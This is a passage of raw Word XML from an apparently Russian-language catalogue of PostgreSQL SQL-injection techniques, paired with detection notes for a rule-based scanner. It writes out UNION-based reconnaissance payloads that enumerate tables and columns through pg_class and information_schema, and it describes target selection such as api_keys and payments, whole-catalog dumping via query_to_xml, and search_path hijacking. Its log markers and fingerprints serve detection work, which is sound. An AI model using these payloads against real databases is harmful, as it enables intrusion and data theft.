          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE table_schema NOT IN ('pg_catalog', 'information_schema') --'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Аналог Payload B для колонок:</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ordinal_position, column_name || ':' || data_type, 0 FROM information_schema.columns WHERE table_schema = 'public' AND table_name = 'users' --</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60" w:before="140"/>
      </w:pP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под капотом фильтрует строки по правам — атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">видит только то, на что у роли есть GRANT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. Это вариант для атак, где application-роль уже имеет SELECT на целевые таблицы (что почти всегда — иначе само приложение не работает). Для разведки таблиц других ролей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не подходит — нужен прямой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(Payload A).</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получает три уровня информации, каждый — пререквизит для следующего шага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Список таблиц</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → выбор цели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api_keys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payments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Список колонок с типами</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → подбор UNION с совместимым числом и типами колонок для извлечения данных через 3.1.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Карта схем</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> → понимание мульти-tenant архитектуры (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">tenant_42.orders</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tenant_43.orders</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), наличие audit-таблиц, отдельных схем для миграций (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">flyway_schema_history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alembic_version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Дополнительные полезные каталоги по той же модели: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pg_index</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — индексы (показывает уникальные ключи, частичные индексы с WHERE-выражениями, выражения индексов как подсказку к семантике колонок).</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pg_constraint</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — FK/PK/CHECK ограничения (схема связей таблиц).</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pg_trigger</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — какие триггеры висят на таблицах (полезно для понимания audit-логирования: тихие операции через DELETE могут писаться куда-то).</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pg_views.definition</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — исходный код view (часто там видны фильтры авторизации, которые в самом запросе не очевидны).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pg_indexes.indexdef</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INDEX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> команды текстом (включая выражения индексов).</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 настоящие таблицы (физические файлы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_global</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> или per-database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а не view с фильтрацией. SELECT на них не зависит от прав на пользовательские таблицы, к которым они описывают метаданные.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 историческим причинам (совместимость со стандартом SQL и переносимостью приложений между БД) SELECT на основные каталоги выдан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через дефолтные GRANT-ы в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">template1</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CREATE DATABASE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> новые БД наследуют этот ACL.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format_type(atttypid, atttypmod)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — официальная функция PostgreSQL для конвертации внутреннего OID типа + modifier в строку (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">varchar(255)</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numeric(10,2)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Альтернатива через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_type.typname</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> показывает «сырое» имя (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">bpchar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int4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), что менее читаемо.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Каст </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">'schema.table'::regclass</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — это вызов специального input-парсера типа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который ищет relation в каталоге и возвращает OID. Используется потому, что прямой </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WHERE attrelid = (SELECT oid FROM pg_class WHERE ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> длиннее.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(Payload C) — view поверх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дополненные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-фильтрами в WHERE. Эти фильтры применяются на этапе планировщика, поэтому через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видны только объекты, доступные текущей роли.</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PG-версия:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 14–17 (структура каталогов стабильна с 7.x; добавляются новые колонки в новых major, но используемые здесь — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relkind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relnamespace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nspname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attnum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attname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atttypid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atttypmod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attisdropped</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — есть везде).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 требуются —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всегда в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и доступен без квалификатора.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См. таблицу в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3.8.0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Конфиги GUC:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> работает при любых дефолтах. Известные исключения: managed PG, где провайдер отдельно ограничивает доступ — практически никогда не делается, потому что приложения и ORM (Django, SQLAlchemy, Hibernate) активно используют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для миграций и introspection.</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Запросы к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от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">application-роли</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почти всегда атака. Легитимный код приложения обращается к каталогам в двух местах: на старте — миграции (Alembic, Flyway) проверяют наличие таблиц; на каждом запросе — это не должно происходить. Маркер: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от application-роли в момент, когда миграции не выполняются.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ORM иногда генерирует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-запросы при reflection (SQLAlchemy </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">Table('users', autoload_with=engine)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">). Маркер легитимности: запрос имеет жёстко зашитую WHERE (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relname = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, без UNION, без </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 атака — UNION или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> массовая выборка.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pg_stat_activity.query</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> от application-роли — JOIN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с фильтром </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">relkind = 'r'</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> и широкой выборкой — атака. Это паттерн именно разведки структуры, а не точечной проверки одной таблицы.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после нормализации payload-а — запись вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SELECT $1, n.nspname || $2 || c.relname, $3 FROM pg_class c JOIN pg_namespace n ON c.relnamespace = n.oid WHERE c.relkind = $4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — характерный отпечаток recon-payload-а.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Атака через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(Payload C) от application-роли — то же правило: точечные запросы (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">table_name = $1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) — норма для ORM; широкая выборка с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">NOT IN</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — recon.</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14–17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> без изменений. Структура трёх ключевых каталогов стабильна с PG 7.x.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AWS RDS / Google Cloud SQL / Supabase —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доступны как PUBLIC во всех конфигурациях. Провайдеры не ограничивают каталоги, потому что это сломает все ORM и инструменты миграции. Единственное отличие на managed: список таблиц включает служебные таблицы провайдера (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rds_*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на RDS, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">cloudsqladmin.*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> на Google Cloud SQL) — атакующий видит их сразу, что само по себе fingerprint managed-инстанса. Детально по провайдерам —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3.1.x</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — после разведки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атакующий строит UNION-payload с правильным числом и типами колонок для целевой таблицы.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для аналогичной разведки функций (имена, языки, владельцы).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3.8.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — fingerprinting версии PG для выбора применимых CVE из раздела 4. На практике 3.8.4 идёт </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">до</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.8.1, чтобы заранее знать, есть ли в кластере специфические для PG 17 каталоги (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_subscription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pg_replication_origin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3.8.5</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query_to_xml('SELECT * FROM pg_catalog.pg_class', ...)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — массовый дамп через один XML-вызов, если по какой-то причине нужно одной командой утащить всю карту.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search_path</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> hijacking — после разведки через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атакующий знает все схемы, где есть его CREATE-права (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">pg_namespace.nspacl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чтения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app/services/judge/rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> нет. Класс </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">SQL_INJECTION_CLASSIC</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> ловит сам факт конкатенации (через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">_RE["py_concat"]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format_string</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">), но не сигнализирует, что payload содержит recon-функционал.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добавить отдельный enum-вариант </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">METADATA_RECON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VulnerabilityClass</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app/schemas/sql.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">) с базовым риском 7 и regex-веткой в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:cs="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">rules.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
